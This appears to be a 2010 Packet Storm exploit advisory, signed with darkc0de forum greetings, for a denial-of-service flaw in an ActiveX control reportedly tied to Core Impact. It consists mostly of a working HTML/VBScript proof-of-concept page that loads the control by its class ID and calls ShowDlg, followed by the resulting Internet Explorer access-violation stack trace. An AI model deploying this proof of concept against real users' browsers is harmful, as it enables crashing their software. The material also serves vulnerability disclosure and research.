Core Impact Denial Of Service

2010-02-12T00:00:00
ID PACKETSTORM:86191
Type packetstorm
Reporter Beenu Arora
Modified 2010-02-12T00:00:00

Description

                                        
                                            `################################################################   
# .___ __ _______ .___ #   
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #   
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #   
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #   
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #   
# \/ \/ \/ #   
# ___________ ______ _ __ #   
# _/ ___\_ __ \_/ __ \ \/ \/ / #   
# \ \___| | \/\ ___/\ / #   
# \___ >__| \___ >\/\_/ #   
# est.2007 \/ \/ forum.darkc0de.com #   
################################################################   
# Greetz to all Darkc0de ,AI, AH,ICW Memebers  
#Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,zerocode,dalsim,7, Anirban , Anas, Navneet ,Varun, Dilip, Manish  
#Special Thanks to r45c4l for allowing analysis on his product  
  
#RegKey Safe for Script: False  
#RegKey Safe for Init: False  
  
#Implements IObjectSafety: True   
  
<html>  
Test DoS Page  
<object classid='clsid:CDF8A044-74AF-4045-AE13-D8AEDF802538' id='target' ></object>  
<script language='vbscript'>  
arg1=String(1, "A")  
target.ShowDlg arg1   
</script>  
  
  
Access violation exception (0xC0000005) when trying to read from memory location 0x00000020 in the thread below.  
  
Function Arg 1 Arg 2 Arg 3 Source   
TargetControl+145d0 0000000f 00000000 00000000   
mfc80u!CWnd::WindowProc+22 0000000f 00000000 00000000   
mfc80u!AfxCallWndProc+a3 00000000 003008d0 0000000f   
mfc80u!AfxWndProc+35 003008d0 0000000f 00000000   
TargetControl!DllGetClassObject+c1a2 003008d0 0000000f 00000000   
user32!InternalCallWinProc+28 05987d5f 003008d0 0000000f   
user32!UserCallWinProcCheckWow+150 03c6a110 05987d5f 003008d0   
user32!DispatchClientMessage+a3 0068d978 0000000f 00000000   
user32!__fnDWORD+24 0013debc 00000018 0068d978   
ntdll!KiUserCallbackDispatcher+13 7e42aedc 003e08f6 0000005e   
user32!NtUserCallHwndLock+c 003e08f6 0694e16c 0013df74   
mfc80u!CWnd::RunModalLoop+77 00000004 4aba760d 00000000   
mfc80u!CDialog::DoModal+129 4ab791a2 05540874 00000000   
TargetControl+ef9f 0694db40 0000001c 00000004   
oleaut32!CTypeInfo2::Invoke+234 03c7491c 0694db40 00000000   
TargetControl+11c58 0694db40 00000001 00000409   
mshtml!COleSite::ContextInvokeEx+149 0414b6f0 00000001 00000409   
mshtml!COleSite::ContextThunk_InvokeEx+44 0414b6f0 00000001 00000409   
vbscript!IDispatchExInvokeEx2+a9 0003b8d8 0414ce50 00000001   
vbscript!IDispatchExInvokeEx+56 0003b8d8 0414ce50 00000001   
vbscript!InvokeDispatch+101 0003b8d8 0003b990 00000001   
vbscript!InvokeByName+42 0003b8d8 0414ce50 00000001   
vbscript!CScriptRuntime::RunNoEH+234c 0013e6a4 4aab5064 00000000   
vbscript!CScriptRuntime::Run+62 0013e6a4 0003fd08 0003b8d8   
vbscript!CScriptEntryPoint::Call+51 0013e6a4 00000000 00000000   
vbscript!CSession::Execute+c8 0003fd08 0013e888 00000000   
vbscript!COleScript::ExecutePendingScripts+144 0013e888 0013e868 0003e454   
vbscript!COleScript::ParseScriptTextCore+243 0414cd54 0414a394 00000000   
vbscript!COleScript::ParseScriptText+2b 0003e454 0414cd54 0414a394   
mshtml!CScriptCollection::ParseScriptText+1da 0414ca90 73301e34 00000000   
mshtml!CScriptElement::CommitCode+1e1 00000000 00000000 00000000   
mshtml!CScriptElement::Execute+a4 0414a520 06194d97 00000000   
mshtml!CHtmParse::Execute+41 0414a5e0 0414a520 7dcc4b65   
mshtml!CHtmPost::Broadcast+d 7dcc4b83 06194d97 0414a520   
mshtml!CHtmPost::Exec+32b 06194d97 0414a520 04140810   
mshtml!CHtmPost::Run+12 06194d97 04140810 06194ccf   
mshtml!PostManExecute+51 04140810 06194d97 0414a520   
mshtml!PostManOnTimer+76 00250938 00000113 00001003   
user32!InternalCallWinProc+28 7dcfb9d8 00250938 00000113   
user32!UserCallWinProc+f3 00000000 7dcfb9d8 00250938   
user32!DispatchMessageWorker+10e 0013eb90 00000000 0013eb78   
user32!DispatchMessageW+f 0013eb90 00000000 00163468   
browseui!TimedDispatchMessage+33 0013eb90 0013ee98 00000000   
browseui!BrowserThreadProc+336 00162ca8 0013ee98 00162ca8   
browseui!BrowserProtectedThreadProc+50 00162ca8 00162ca8 00000000   
browseui!SHOpenFolderWindow+22c 00162ca8 00000000 00000000   
shdocvw!IEWinMain+133 001523ba 00000001 0140d0b8   
iexplore!WinMainT+2de 00400000 00000000 001523ba   
iexplore!_ModuleEntry+99 0140d0b8 00000018 7ffdf000   
kernel32!BaseProcessStart+23 00402451 00000000 78746341   
`